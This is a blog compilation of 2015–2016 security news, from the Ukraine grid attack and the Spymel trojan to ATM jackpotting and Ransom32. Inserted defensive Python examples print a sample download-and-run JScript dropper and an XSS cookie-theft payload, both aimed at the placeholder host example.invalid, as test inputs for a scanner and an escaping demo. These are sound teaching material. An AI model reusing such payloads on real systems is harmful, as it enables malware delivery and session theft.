Powered by Blogger.

Hackers caused power cut in western Ukraine

The Department of Homeland Security's (DHS) Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) has identified a piece of malicious code known as 'BlackEnergy' in the networks of a power company in western Ukraine.

The code came to light when the United States intelligence community investigated a cyber attack on the Ukrainian power grid that took place in December of last year.

BlackEnergy is a sophisticated malware campaign that has been ongoing since at least 2011. It targets industrial control systems and has been identified on Internet-connected human-machine interfaces in the United States.

The investigation shows that the power outages were caused by a series of network-centric attacks against multiple utilities, which disrupted Supervisory Control and Data Acquisition (SCADA) and phone systems. ICS-CERT and US-CERT, along with the Ukrainian CERT, are still analyzing the malware, which was likely used to prevent system operators from detecting the attack while a remote attacker opened breakers.

The malware itself is not especially sophisticated and may have been used mainly to shield the perpetrators.

On December 23 a power cut affected 80,000 customers for six hours. The attacks disconnected at least seven 110 kilovolt (kV) and twenty-three 35 kV substations.

Ukraine's security service blamed the Russian government for the incident; it was later noted that the BlackEnergy malware associated with the incident is linked to the Russian hacking group 'Sandworm'. In October 2014 it was reported that Sandworm had compromised industrial control systems in the US over a period of up to three years.

The malware has been found attacking utilities and media organizations, wiping hard drives with its KillDisk component.

Former NSA and CIA head, retired Gen. Michael Hayden, has warned about the increasing threat of physical damage caused by malware infections.

A Trojan that evades security products and steals data

Spymel, a new Trojan discovered by Zscaler (a US-based cyber-security vendor), reaches computers through spam emails and remains undetected by security products.

The Trojan is attached to emails as an archive file. Once the archive is downloaded and decompressed, it yields a JavaScript file which, when run, downloads and installs the actual malware executable, a .NET binary.
Because the archive itself does not contain the malware, antivirus products fail to flag the danger. The .NET binary also goes undetected because it is signed with a digital certificate issued by DigiCert to "SBO INVEST".

According to Zscaler, Spymel infections were first detected in early December 2015. Zscaler reported the case to DigiCert and had the certificate revoked, but the group behind Spymel quickly updated their certificate.

Spymel can act as a downloader for further malware payloads, take screenshots of the user's desktop, record video of the desktop, log keystrokes, and upload the stolen data to a remote server.

Spymel is a clear example of malware using archive files booby-trapped with JavaScript code, together with a valid digital certificate, to hide from security products.
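The delivery chain above (a script inside an archive attachment that fetches a signed second stage) is what a mail gateway can catch before the binary ever lands. Below is an added example, not Zscaler's code or anything from the original post, of that check in Python: it opens an attachment archive, flags members with Windows-executable script extensions or double extensions, and greps them for the objects a download-and-run dropper needs. The sample archive, file names and indicator list are constructed for the example.

```python
"""Mail-gateway style check for script droppers hidden in archive attachments.

Added example (not Zscaler's or the blog's code): it flags archive members
that Windows would execute on double-click, which is the delivery technique
the article describes (a JavaScript file inside an archive that fetches the
real payload). The sample archive is constructed inline.
"""
import io
import re
import zipfile

# Extensions the Windows Script Host or shell executes directly. The archive
# holds no PE binary, which is why a byte-signature scanner sees nothing.
# Assumed list; extend to taste.
SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".ps1"}

# Objects and strings a dropper needs to fetch and run a second stage.
# Heuristic indicators, not a complete signature.
DROPPER_PATTERNS = [
    re.compile(rb"MSXML2\.XMLHTTP", re.I),
    re.compile(rb"WScript\.Shell", re.I),
    re.compile(rb"ADODB\.Stream", re.I),
    re.compile(rb"\.Run\s*\(", re.I),
    re.compile(rb"https?://", re.I),
]

# Document-like extensions commonly used as the first half of a double
# extension lure such as invoice.pdf.js.
LURE_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "txt"}


def suspicious_members(archive_bytes):
    """Return a list of (member_name, reasons) for members that look like
    script droppers. Reasons are short strings suitable for a log line."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            parts = name.lower().rsplit(".", 2)
            ext = "." + parts[-1] if len(parts) > 1 else ""
            reasons = []
            if ext in SCRIPT_EXTENSIONS:
                reasons.append("script extension " + ext)
                if len(parts) == 3 and parts[1] in LURE_EXTENSIONS:
                    reasons.append("double extension disguised as ." + parts[1])
                data = zf.read(info)
                hits = [p.pattern.decode() for p in DROPPER_PATTERNS if p.search(data)]
                if hits:
                    reasons.append("dropper indicators: " + ", ".join(hits))
            if reasons:
                findings.append((name, reasons))
    return findings


def build_sample_archive():
    """Constructed test input: a benign text member plus a script that
    resembles the download-and-execute stage described in the article.
    example.invalid is a reserved name that never resolves."""
    dropper = (
        b'var x = new ActiveXObject("MSXML2.XMLHTTP");\n'
        b'x.open("GET", "http://example.invalid/payload.exe", false);\n'
        b'x.send();\n'
        b'var s = new ActiveXObject("ADODB.Stream");\n'
        b'var sh = new ActiveXObject("WScript.Shell");\n'
        b'sh.Run("%TEMP%\\\\payload.exe");\n'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice_12345.pdf.js", dropper)
        zf.writestr("readme.txt", b"Please see attached invoice.")
    return buf.getvalue()


if __name__ == "__main__":
    for member, reasons in suspicious_members(build_sample_archive()):
        print(member, "->", "; ".join(reasons))
```

The signed-binary stage is the harder problem: a valid certificate is evidence of identity, not of intent, so a freshly issued or recently revoked code-signing certificate is better treated as a reputation signal than as an allow decision.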

Mozilla awards $2,500 to security researcher

Security researcher Ashar Javed recently discovered three bugs in the Mozilla add-ons portal, one of which could be exploited via the "Create new collection" feature.

He found that malicious code could be injected into a Mozilla add-on collection. Collections are used to organize add-ons for business and personal purposes and can be shared on social media as well.

“Given that the Mozilla add-on site has millions of downloads, it is easily possible for the attacker to convince the victim to visit the collection page,” the expert told SecurityWeek.

Users who visited such a page were exposed to the kinds of attack that can be carried out via XSS flaws, the most common being cookie theft.

XSS flaws are common on websites, and add-on collections are widely used by Firefox users, so for discovering the issue Mr Javed received $2,500 from Mozilla. He reported two other bugs, about which Mozilla has not revealed any information apart from their location.

This is not the first time he has received a sizeable reward: Google awarded him $3,000 for a reflected XSS in the main search bar of the YouTube Gaming website.
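Stored XSS of the kind found in the collection feature comes down to one mistake: interpolating a user-chosen name into a page without escaping. The following is an added example in Python (not Mozilla's code; the payload, page structure and cookie name are invented for it) showing the vulnerable rendering beside the escaped one, plus the cookie flags that take document.cookie off the table for the cookie-theft outcome the article mentions.

```python
"""Stored XSS in a user-named resource, as an added example (not Mozilla's code).

A collection page that interpolates the user-supplied collection name into
HTML without escaping will execute any script the name contains; the same
page built with html.escape() renders the payload as inert text. The cookie
helper shows the HttpOnly/SameSite flags that blunt cookie theft. All names
and the payload are constructed for this example.
"""
import html
import re

# Constructed attacker input: a collection name carrying a cookie-exfiltration
# script. example.invalid is a reserved name that never resolves.
PAYLOAD_NAME = (
    '<script>new Image().src="http://example.invalid/c?"+document.cookie</script>'
)

_SCRIPT_TAG = re.compile(r"<script\b", re.I)


def render_collection_vulnerable(name, owner):
    """String concatenation straight into markup: the stored XSS pattern."""
    return (
        "<h1>" + name + "</h1>\n"
        "<p>Shared by " + owner + "</p>\n"
    )


def render_collection_safe(name, owner):
    """Same page with every untrusted value escaped for an HTML text context.
    html.escape turns < > & " ' into entities, so the browser shows the
    payload as text instead of parsing it as a tag."""
    return (
        "<h1>" + html.escape(name, quote=True) + "</h1>\n"
        "<p>Shared by " + html.escape(owner, quote=True) + "</p>\n"
    )


def contains_live_script(page):
    """True if the page still carries a raw <script tag, i.e. the payload
    would execute when a victim views the collection."""
    return _SCRIPT_TAG.search(page) is not None


def session_cookie_header(session_id):
    """Set-Cookie value that keeps the session token out of document.cookie
    (HttpOnly) and off cross-site requests (SameSite). A successful XSS can
    still act on the victim's behalf, but cannot simply read the cookie."""
    return "sessionid=%s; Path=/; Secure; HttpOnly; SameSite=Lax" % session_id


if __name__ == "__main__":
    vulnerable = render_collection_vulnerable(PAYLOAD_NAME, "attacker")
    safe = render_collection_safe(PAYLOAD_NAME, "attacker")
    print("vulnerable page executes script:", contains_live_script(vulnerable))
    print("escaped page executes script:   ", contains_live_script(safe))
    print(session_cookie_header("abc123"))
```

Escaping is context-specific: the helper above is correct for element text and attribute values, but a name inserted into a JavaScript string, a URL or a CSS block needs the encoder for that context instead.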

Malware targeting Android-powered Smart TVs

With the festive season over, many homes are now equipped with smart gadgets. Among all the new gadgets on the market, one of the most popular choices was the smart TV. With access to Android apps and functioning much like any other Android device, these TVs are a hit as they provide a high-resolution experience with the familiar Android interface. However, these devices have their own vulnerabilities to malware.

These TVs have abilities that a normal TV does not. They can run apps that allow users to watch channels from other parts of the world that would otherwise be unavailable. However, some of these apps put users at risk: they contain a backdoor that abuses an old flaw (CVE-2014-7911) in Android versions before Lollipop 5.0 (Cupcake 1.5 to KitKat 4.4W.2). (Trend Micro detects these malicious apps as ANDROIDOS_ROOTSTV.A.) Most smart TVs today run older versions of Android that still contain this flaw. Other Android devices with older versions installed are also at risk; it just happens that these kinds of apps are mainly used on smart TVs or smart TV boxes. The sites that distribute the malicious apps operate under the H.TV name, with most visitors located in the United States or Canada.

To distribute the malware, attackers lure users to those websites and get them to install the backdoored applications. Once a malicious application has been installed, the attacker triggers the vulnerability and uses well-known exploitation techniques such as heap spraying or return-oriented programming to gain elevated privileges on the system.

Samsung recently launched a three-tiered security solution for its latest Tizen-based smart TVs. According to the company's statement, the service is meant to give consumers the necessary protection across the smart TV ecosystem, covering both software and hardware.

Security flaw in Trend Micro product unveiled by Google security researcher

Google security researcher Tavis Ormandy has found bugs in the Password Manager of global security software company Trend Micro.

Password Manager is a component installed by default with Trend Micro's Premium Security and Maximum Security home products.

Ormandy informed Trend Micro of his findings on January 5.

The component is primarily written in JavaScript on node.js, and the bug could allow any website to execute arbitrary code on the machine and steal all of the user's passwords. He also noted that it was possible to bypass Internet Explorer's Mark of the Web (MOTW) security feature and execute commands without the victim receiving any notification.

Ormandy took about 30 seconds to identify an API that could be leveraged for remote code execution (RCE). Overall, he found over 70 APIs exposed to the Internet.

Exploiting such a vulnerability can give an attacker deep access to a computer.
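The class of bug Ormandy describes is a local helper service that answers any caller, so any web page the user visits can drive it through the browser. The block below is an added example, not Trend Micro's code and not Ormandy's proof of concept; the origin, port, header names and token handling are assumptions. It contrasts the "trust everyone" policy with one that requires both an allow-listed Origin and a per-launch secret, and wires that policy in front of a tiny loopback HTTP server.

```python
"""Origin and token check for a localhost management API.

Added example (not Trend Micro's code, not Ormandy's exploit). The bug class
the article describes: a helper service on 127.0.0.1 accepts commands from
any web page, because browsers happily send page-initiated requests to
localhost. The policy below rejects browser-originated requests unless they
carry an allow-listed Origin and a per-launch secret that only the product's
own UI is given. Origin, port and header names are assumptions.
"""
import hmac
import secrets
from http.server import BaseHTTPRequestHandler, HTTPServer

# Origin allowed to call the local API (assumed product UI origin).
ALLOWED_ORIGINS = {"https://pwm.example.invalid"}

# Fresh on every process start. The product's own UI would receive it out of
# band (for example injected into its page); a third-party site cannot guess it.
SESSION_TOKEN = secrets.token_urlsafe(32)


def authorize(headers, expected_token=None):
    """Decide whether a request to the local API may run.

    headers: mapping of HTTP header name -> value (any case).
    Returns (allowed, reason).
    """
    if expected_token is None:
        expected_token = SESSION_TOKEN
    h = {k.lower(): v for k, v in headers.items()}
    origin = h.get("origin")
    token = h.get("x-api-token", "")
    # Browsers send Origin on cross-origin fetch/XHR and on POST. A request
    # from an unknown origin is a web page trying to drive the service.
    if origin is not None and origin not in ALLOWED_ORIGINS:
        return False, "origin not allowed: %s" % origin
    # Non-browser clients (no Origin) still have to present the secret.
    # compare_digest keeps the comparison constant-time.
    if not hmac.compare_digest(token, expected_token):
        return False, "missing or wrong API token"
    return True, "ok"


def vulnerable_authorize(headers):
    """What the flawed design amounts to: every caller is trusted."""
    return True, "ok"


class LocalApiHandler(BaseHTTPRequestHandler):
    """Minimal handler placing authorize() in front of a command endpoint.
    The endpoint body is a stand-in; a real product would dispatch here."""

    def do_POST(self):
        allowed, reason = authorize(self.headers)
        if not allowed:
            self.send_response(403)
            self.end_headers()
            self.wfile.write(reason.encode())
            return
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"command accepted")


if __name__ == "__main__":
    # Bind to loopback only; listening on 0.0.0.0 would widen the exposure.
    print("API token for the trusted UI:", SESSION_TOKEN)
    HTTPServer(("127.0.0.1", 49152), LocalApiHandler).serve_forever()
```

The Origin check alone is not enough, because non-browser clients omit the header and a browser cannot be relied on to send it for every request type; the per-launch token closes that gap, and binding to loopback keeps the service off the network entirely.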

Several serious vulnerabilities have been found over the past seven months in antivirus products from vendors including Kaspersky Lab, ESET, Avast, AVG Technologies, Intel Security (formerly McAfee) and Malwarebytes.

Europol dismantles ATM malware gang

Europol has dismantled a gang that used malware known as Tyupkin (also called Padpin) to carry out a new type of attack commonly known as "jackpotting". The malware was first analyzed in 2014 by Kaspersky Lab after it was found on more than 50 machines in eastern Europe. It is known for enabling its operators to withdraw money from ATMs without cards.

Romania's Directorate for Investigating Organised Crime and Terrorism (DIICOT) stated that the arrested individuals are suspected of establishing an organised criminal group, illegally accessing computer systems, committing computer fraud, disrupting information systems, altering data integrity, illegally operating devices and software, and destroying property.

The suspects, residents of Romania and the Republic of Moldova, are alleged to have caused damage of approximately $217,000. The group, led by Moldovan national Solozabal Cuartero Rodion and Romanian national Mihaila Sorin, targeted ATMs in European countries, primarily Romania, Hungary, the Czech Republic, Spain and Russia, as reported by Romanian prosecutors.

In the first phase of the attack, on weekdays, members of the group scouted ATMs, specifically targeting 24-hour cash machines that looked open to manipulation. After locating an ATM, they tampered with the machine to gain access to its CD-ROM drive, which was then used to plant the malware. The group disabled existing alarm sensors with duct tape. Malware planted on a weekday went to work at the weekend: once it was in place, the group sent commands to it instructing the machine to dispense cash.

The group made a point of dispensing cash in small transactions of about $1,000 rather than emptying the machines in one go. Once a machine had dispensed all its cash, the malware removed itself automatically. Because these attacks cause serious harm to ATM operators, the European ATM Security Team (EAST) and Europol published guidelines last year to help law enforcement and the industry counter the threat, and in September security firms began reporting two new malware families. One of these, known as GreenDispenser, is similar to Tyupkin in that it uses the machine's PIN pad to empty the vault. The other, called Suceful, captures cards inserted into ATMs by cardholders.

Time Warner Cable says 320,000 passwords possibly stolen

American telecommunications company Time Warner Cable Inc has declared that up to 320,000 customers may have had their email passwords stolen.

The company has not yet determined the source of the theft, but said it might have occurred either through malware downloaded during phishing attacks or indirectly through data breaches at other companies that stored customer information.

The company learned of the breach after being notified by the Federal Bureau of Investigation.

The company is emailing customers to encourage them to update their email passwords as a precaution.

Newly discovered Ransom32 is the first ransomware written in JavaScript

Security researchers have discovered a new Ransomware-as-a-Service campaign that, for the first time, uses malware written in JavaScript. Fabian Wosar of Emsisoft explained in a blog post that would-be affiliates sign up for Ransom32 on a Tor site using just a Bitcoin address, to which the spoils are sent minus a 25% cut taken by the operators.


After signing up, affiliates get access to a basic admin page that lets them see how many systems are infected, observe how much money has been collected, and tweak various settings for the ransomware. These include how much BTC to request from victims, and whether to completely lock the computer or allow a victim to minimize the lock screen, giving them the ability to check whether their files really are encrypted. Ransom32 is a 22MB self-extracting RAR file, which weighs in at over 67MB when extracted. Once run, the executable creates a shortcut, ChromeService, which points to a chrome.exe package that is actually a NW.js application containing the JavaScript code that encrypts the victim's data and then displays a ransom note.

The files extracted into the Chrome Browser folder are:

    chrome - The Chromium license agreement.
    chrome.exe - The main executable of the malware: a packaged NW.js application bundled with Chromium.
    ffmpegsumo.dll - HTML5 video decoder DLL that is bundled with Chromium.
    g - The settings file containing various information used by the malware, including the affiliate's ransom amount, the Bitcoin address on which they receive payments, and the error message shown in a message box if the "Show a message box" setting was enabled.
    icudtl.dat - File used by Chromium.
    locales - Folder containing the various language packs used by Chromium.
    msgbox.vbs - The message box displayed if the affiliate enabled the "Show a message box" setting.
    nw.pak - Required by the NW.js platform.
    rundll32.exe - Renamed Tor executable, so that the malware can communicate with its Tor command-and-control server.
    s.exe - Renamed Shortcut.exe from OptimumX, a legitimate program the malware uses to create the ChromeService shortcut in the Startup folder.
    u.vbs - A VBS script that deletes a specified folder and its contents.

Raspberry Pi Foundation was offered money to install malware

The Raspberry Pi Foundation has been offered money to install malware on its mini computers before they are shipped to users.

The foundation makes an extremely simple computer that looks and feels very basic but can be built into many hobbyist projects; thanks to its low-cost appeal it has sold approximately 4 million units.

Last month the foundation unveiled the Raspberry Pi Zero, a programmable computer priced at just $5, which may rank as the world's cheapest computer.

The revelation came when the foundation tweeted, last Wednesday, a screenshot of an email in which a business officer named Linda asked Raspberry Pi's director of communications, Liz Upton, to install a suspicious executable file onto the machines in exchange for a 'price per install'.

The foundation declined the offer from the unnamed company, but the episode raises the question of how common and widespread such offers are.

Drones a new target for drug traffickers in the US

Unmanned aerial vehicles (UAVs) are new instruments for surveillance and are widely used by the military and other sensitive agencies, but what happens if they are hacked by attackers?

According to reports from the US Department of Homeland Security (DHS) and the US Customs and Border Protection (CBP) agency, drug traffickers have hacked UAVs (drones) in order to cross the US-Mexican border illegally and unnoticed.

Drones used by the US military cost millions of dollars, but those used by other law-enforcement agencies are much cheaper and are prone to GPS spoofing attacks.

UAVs carry GPS receivers, which take positioning data from satellites in orbit in order to navigate. Drug traffickers have used GPS spoofing to send the UAVs false coordinates.

After receiving the false coordinates, the drone "corrects" itself and leaves its normal patrol area. Once it is out of range of the GPS jamming and spoofing device, it tries to correct again, heading back to its proper patrol area. It keeps going back and forth until it runs low on fuel and returns to base, or until the traffickers have safely crossed the border and switched off their jammers.

According to the report, the only way to prevent GPS spoofing is to build expensive anti-spoofing hardware into the drone.

Michael Buscher, CEO of Vanguard Defense Industries, said: “This is a very costly module, and also very bulky. Adding such equipment to a drone is not only very expensive but also affects the drone's flight time, something which both the DHS and CBP are not willing to accept.”

The only solution to this security hole, for now, is to wait for the technology to advance and its manufacturing costs to come down.
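The article leaves anti-spoofing entirely to hardware. A cheaper, partial software check is to reject GPS fixes that are physically implausible, which catches the jump described above (the drone "correcting" kilometres away within seconds) even though it cannot stop a slow, careful spoof that stays within the aircraft's envelope. This is an added example in Python and is not from the DHS/CBP report or any drone vendor; the track, speed limit and tolerances are constructed.

```python
"""Plausibility check for GPS fixes, as a software-side spoofing detector.

Added example (not from the DHS/CBP report or any drone vendor). Each new
fix is tested against the last fix the checker trusted: the implied speed
must not exceed the airframe's maximum, and the position must agree with
dead reckoning from the trusted fix. A rejected fix never becomes the new
reference, so a spoofer cannot walk the reference away one step at a time
with obviously bad fixes. Track, limits and tolerances are constructed.
"""
import math

EARTH_RADIUS_M = 6371000.0


def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres between two WGS84 points."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dp = p2 - p1
    dl = math.radians(lon2 - lon1)
    a = math.sin(dp / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dl / 2) ** 2
    return 2 * EARTH_RADIUS_M * math.asin(math.sqrt(a))


def check_fixes(fixes, max_speed_mps, dr_tolerance_m):
    """Walk a sequence of (t_seconds, lat, lon, ground_speed_mps, heading_deg)
    fixes and return a list of (index, reason) for the ones to reject.

    Two tests per fix, both against the last *trusted* fix:
      1. implied speed = distance / elapsed must not exceed max_speed_mps;
      2. dead reckoning from the trusted fix (its own speed and heading held
         constant) must land within dr_tolerance_m of the reported position.
    """
    if not fixes:
        return []
    suspects = []
    trusted = fixes[0]
    for i in range(1, len(fixes)):
        t, lat, lon, spd, hdg = fixes[i]
        t0, lat0, lon0, spd0, hdg0 = trusted
        dt = t - t0
        if dt <= 0:
            suspects.append((i, "non-monotonic timestamp"))
            continue
        implied = haversine_m(lat0, lon0, lat, lon) / dt
        if implied > max_speed_mps:
            suspects.append((i, "implied speed %.0f m/s exceeds %.0f" % (implied, max_speed_mps)))
            continue
        # Dead reckoning on a local flat-earth approximation, fine over a few km.
        travelled = spd0 * dt
        north = travelled * math.cos(math.radians(hdg0))
        east = travelled * math.sin(math.radians(hdg0))
        lat_dr = lat0 + math.degrees(north / EARTH_RADIUS_M)
        lon_dr = lon0 + math.degrees(east / (EARTH_RADIUS_M * math.cos(math.radians(lat0))))
        err = haversine_m(lat_dr, lon_dr, lat, lon)
        if err > dr_tolerance_m:
            suspects.append((i, "fix %.0f m from dead-reckoned position" % err))
            continue
        trusted = fixes[i]
    return suspects


# Constructed track: a drone flying due east at 30 m/s near the border, then
# a spoofed fix that teleports it about 5 km south, then honest fixes again.
SAMPLE_FIXES = [
    (0.0, 31.7000, -106.5000, 30.0, 90.0),
    (10.0, 31.7000, -106.4968, 30.0, 90.0),
    (20.0, 31.7000, -106.4937, 30.0, 90.0),
    (30.0, 31.6550, -106.4937, 30.0, 90.0),   # spoofed: ~5 km jump in 10 s
    (40.0, 31.7000, -106.4874, 30.0, 90.0),   # genuine, consistent with fix 2
]

if __name__ == "__main__":
    for idx, why in check_fixes(SAMPLE_FIXES, max_speed_mps=60.0, dr_tolerance_m=150.0):
        print("fix", idx, "rejected:", why)
```

The speed test alone is easy to evade by spoofing in small steps; the dead-reckoning test makes the spoofer also fake a consistent speed and heading, and a real autopilot would cross-check against its inertial sensors in the same way. The tolerances must be tuned to the receiver's real noise, or the check will reject honest fixes.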

Irked train hackers talk derailment flaws, drop SCADA password list

A report published in The Register says that Russian hackers claim to have found flaws in rail networks that would allow crooks to hijack and derail trains.

The flaws reportedly affect various systems, including mobile communications and the interlocking platforms that control braking and help prevent collisions.

“Industrial control specialist hackers Sergey Gordeychik, Aleksandr Timorin, and Gleb Gritsai did not describe the bugs in detail, since that would allow others to replicate the attacks, nor reveal the names of the affected rail operators,” the report reads.

According to the report, “If somebody can attack the modem, the modem can attack the automatic train control system, and they can control the train,” Gordeychik says.

The danger is that such flaws expose physical systems like power grids, dams and trains to unauthorized external modification in ways largely unknown to those outside the security industry.

Human programming errors are said to be responsible for various remote code execution holes that could affect interlocking systems.

“We are releasing the list to force vendors to not use hardcoded and default passwords,” an irritated Gordeychik says.

The Register report says that the attack vectors against computer-based interlocking include attacks against workstations, attacks against the networking gateways that connect the interlocking to the rest of the world, and attacks on the communications between the CPU and the object controllers and wayside devices.